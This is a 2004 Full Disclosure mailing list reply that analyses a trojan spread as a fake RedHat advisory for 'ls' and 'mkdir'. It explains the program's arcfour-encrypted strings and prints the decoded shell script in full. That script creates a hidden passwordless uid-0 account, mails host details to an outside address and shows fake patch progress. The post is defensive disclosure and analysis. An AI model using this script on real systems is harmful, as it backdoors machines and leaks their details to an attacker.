Full Disclosure mailing list archives
Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir"
From: Andrew Farmer <andfarm () teknovis com>
Date: Sun, 24 Oct 2004 18:18:41 -0700
Hugo van der Kooij wrote:
Be advised. The message below is currently going around on internet. Being unsinged was the fist obvious issue. Not pointing to RPM updates, being in a different format and such were among the other reasong to suspect it. Message was send from 'University of Texas at Arlington'.I am sure none of you should be fooled by such a message but other mightbe.And while it lasts you may want to get the file for your own educationalpurposes.
<snip>I did a quickie analysis of the program (which is basically just distributed as source!).
Strings are encrypted with arcfour; however, as the keys are included too, decrypting them is no problem.
pswd[] is an initialization vector for arcfour. shll[] decodes to: /bin/sh inlo[] decodes to: -c xecc[] decodes to: exec '%s' "$@" lsto[] decodes to a null string. chk1[] decodes to: KTZE4lIVf7i4BRopts[], text[], and chk2[] are encrypted with some (apparently constant) data retrieved by statting /bin/sh.
To cut to the chase, the whole thing ends up clearing the screen and running the following shell script:
#!/bin/sh cd /tmp/ clear if [ `id -u` != "0" ] thenecho "This patch must be applied as \"root\", and you are: \"`whoami`\""exit fiecho "Identifying the system. This may take up to 2 minutes. Please wait ..."sleep 3 if [ ! -d /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " ]; then echo "Inca un root frate belea: " >> /tmp/mama adduser -g 0 -u 0 -o bash >> /tmp/mama passwd -d bash >> /tmp/mama ifconfig >> /tmp/mama uname -a >> /tmp/mama uptime >> /tmp/mama sshd >> /tmp/mama echo "user bash stii tu" >> /tmp/mamacat /tmp/mama | mail -s "Inca o roata" root () addlebrain com >> /dev/nullrm -rf /tmp/mama mkdir -p /tmp/." "/." "/." "/." "/." "/." "/." "/." "/." " fi bla() { sleep 2 echo -n "#" sleep 1 echo -n "#" sleep 1 echo -n "#" sleep 2 echo -n "#" sleep 1 echo -n "#" sleep 1 echo -n "#" sleep 3 echo -n "#" sleep 1 echo -n "#" sleep 4 echo -n "#" sleep 1 echo -n "#" sleep 1 echo "#" sleep 1 } echo "System looks OK. Proceeding to next step." sleep 1 echo echo -n "Patching \"ls\": " bla echo -n "Patching \"mkdir\": " bla echoecho "System updated and secured successfuly. You may erase these files."sleep 1
Attachment:
PGP.sig
Description: This is a digitally signed message part
Current thread:
- FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Hugo van der Kooij (Oct 24)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Harry Hoffman (Oct 24)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Andrew Farmer (Oct 24)
- Re: [security] Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Brett Campbell (Oct 26)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Vincent Archer (Oct 25)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Andrew Farmer (Oct 24)
- <Possible follow-ups>
- FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Feher Tamas (Oct 25)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Stephen Jimson (Oct 26)
- Re: FAKE: RedHat: Buffer Overflow in "ls" and "mkdir" Harry Hoffman (Oct 24)